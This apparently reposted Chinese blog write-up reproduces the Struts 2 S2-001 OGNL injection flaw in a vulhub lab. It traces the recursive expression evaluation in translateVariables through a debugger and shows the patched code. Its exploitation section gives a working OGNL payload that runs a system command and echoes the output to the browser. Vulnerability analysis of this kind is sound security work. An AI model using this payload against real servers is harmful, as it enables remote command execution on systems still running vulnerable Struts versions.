标签:right int S2 start 001 复现 left expression result
一、漏洞信息
漏洞信息页面:
S2-001 - Apache Struts 2 Wiki - Apache Software Foundation
漏洞类型:
RCE(远程代码执行)
受影响组件:
WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8
漏洞成因:
WebWork 2.1+和 Struts 2的altSyntax特性允许将OGNL表达式插入到文本字符串中并递归处理。当恶意用户提交包含OGNL表达式的字符串,且将用户输入返回到当前页面时,服务器将执行该表达式。
二、环境搭建
IDE:Eclipse IDE for Enterprise Java and Web Developers
Java:JDK1.8
Tomcat:8.5.75
Struts:2.0.8(https://github.com/vulhub/vulhub/struts/s2-001)
三、漏洞利用
在username或password输入OGNL表达式语句即可触发漏洞。
执行任意命令并回显。
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
四、漏洞分析
1. Struts2相关
Struts2在接收用户请求后(⑥)以及发送响应前(⑧)会使用拦截器进行处理。
WEB-INF/classes目录下的struts.xml中显示了使用的拦截器为struts默认拦截器。
struts-default.xml位于struts2-core-2.0.8.jar中。关注params拦截器,该拦截器负责解析HTTP请求中的参数,并将参数值设置成Action对应的属性值。
2. 调试分析
找到params拦截器所在类,在doIntercept()函数中下断点。开始调试,web页面输入username为admin,password为%{2*3}。
运行到setParameters,该函数根据请求参数设置action。
继续运行到invocation.invoke(),步入函数。
后续函数调用栈如下
运行到index.jsp第14行,单步步入,直到运行到doStartTag()
doStartTag()开始处理struts标签。此时处理的是s:form标签。
在doStartTag()下断点,运行到处理password标签。
跳出doStartTag(),在index.jsp第16行password处再次单步步入,进入doEndTag,步入component.end函数。
跟踪到evaluateParams(),步入函数。
跟踪到addParameter(),由于开启了表达式语法,altSyntax()返回ture,expr变为%{password}
步入findValue(),跟踪到TextParseUtil.translateVariables,步入函数。
translateVariables函数源码如下
public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
Object result = expression;
while (true) {
int start = expression.indexOf(open + "{");
int length = expression.length();
int x = start + 2;
int count = 1;
while (start != -1 && x < length && count != 0) {
char c = expression.charAt(x++);
if (c == '{') {
count++; continue;
} if (c == '}') {
count--;
}
}
int end = x - 1;
if (start != -1 && end != -1 && count == 0) {
String var = expression.substring(start + 2, end);
Object o = stack.findValue(var, asType);
if (evaluator != null) {
o = evaluator.evaluate(o);
}
String left = expression.substring(0, start);
String right = expression.substring(end + 1);
if (o != null) {
if (TextUtils.stringSet(left)) {
result = left + o;
} else {
result = o;
}
if (TextUtils.stringSet(right)) {
result = result + right;
}
expression = left + o + right;
continue;
}
result = left + right;
expression = left + right;
continue;
}
break;
}
return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
}
在while的第一次循环中,通过stack.findValue获取到password的值,即为输入%{2*3}
第一次循环结束时,expression和result被赋值为%{2*3}
在第二次循环中,通过stack.findValue,将var中内容执行,o被赋值为6
进入第三次循环,因为expression不为表达式,循环结束。
五、漏洞修复
public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {
// deal with the "pure" expressions first!
//expression = expression.trim();
Object result = expression;
int loopCount = 1;
int pos = 0;
while (true) {
int start = expression.indexOf(open + "{", pos);
if (start == -1) {
pos = 0;
loopCount++;
start = expression.indexOf(open + "{");
}
if (loopCount > maxLoopCount) { //默认只进行一次循环,不再递归解析
// translateVariables prevent infinite loop / expression recursive evaluation
break;
}
int length = expression.length();
int x = start + 2;
int end;
char c;
int count = 1;
while (start != -1 && x < length && count != 0) {
c = expression.charAt(x++);
if (c == '{') {
count++;
} else if (c == '}') {
count--;
}
}
end = x - 1;
if ((start != -1) && (end != -1) && (count == 0)) {
String var = expression.substring(start + 2, end);
Object o = stack.findValue(var, asType);
if (evaluator != null) {
o = evaluator.evaluate(o);
}
String left = expression.substring(0, start);
String right = expression.substring(end + 1);
String middle = null;
if (o != null) {
middle = o.toString();
if (!TextUtils.stringSet(left)) {
result = o;
} else {
result = left + middle;
}
if (TextUtils.stringSet(right)) {
result = result + right;
}
expression = left + middle + right;
} else {
// the variable doesn't exist, so don't display anything
result = left + right;
expression = left + right;
}
pos = (left != null && left.length() > 0 ? left.length() - 1: 0) +
(middle != null && middle.length() > 0 ? middle.length() - 1: 0) +
1;
pos = Math.max(pos, 1);
} else {
break;
}
}
return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
}
参考链接
标签:right,int,S2,start,001,复现,left,expression,result 来源: https://www.cnblogs.com/CabbageJun/p/15950193.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。